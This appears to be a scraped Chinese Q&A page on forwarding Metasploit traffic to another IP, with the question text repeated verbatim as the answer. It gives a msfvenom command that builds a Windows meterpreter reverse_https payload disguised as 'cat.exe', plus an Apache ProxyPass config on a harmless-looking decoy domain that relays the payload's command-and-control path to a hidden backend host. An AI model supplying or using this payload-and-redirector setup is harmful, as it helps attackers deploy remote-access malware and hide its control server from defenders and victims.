将 Metasploit 请求转发到另一个 IP

Question

首先，创建有效载荷：

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe

最重要的部分是您需要设置为特定资源的 LURI。有效负载生成的所有流量都将定向到此 URI。

完成后，使用 Apache 或 nginx 中的 ProxyPass 指令仅将 /myawesomecnc 的流量转发到您想要的特定主机。以下是 Apache 的示例：

<VirtualHost *:443>

  ServerName www.totallyharmless.com
...
  ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
  ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>

Answer 1

首先，创建有效载荷：

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe

最重要的部分是您需要设置为特定资源的 LURI。有效负载生成的所有流量都将定向到此 URI。

完成后，使用 Apache 或 nginx 中的 ProxyPass 指令仅将 /myawesomecnc 的流量转发到您想要的特定主机。以下是 Apache 的示例：

<VirtualHost *:443>

  ServerName www.totallyharmless.com
...
  ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
  ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>

将 Metasploit 请求转发到另一个 IP

答案1

相关内容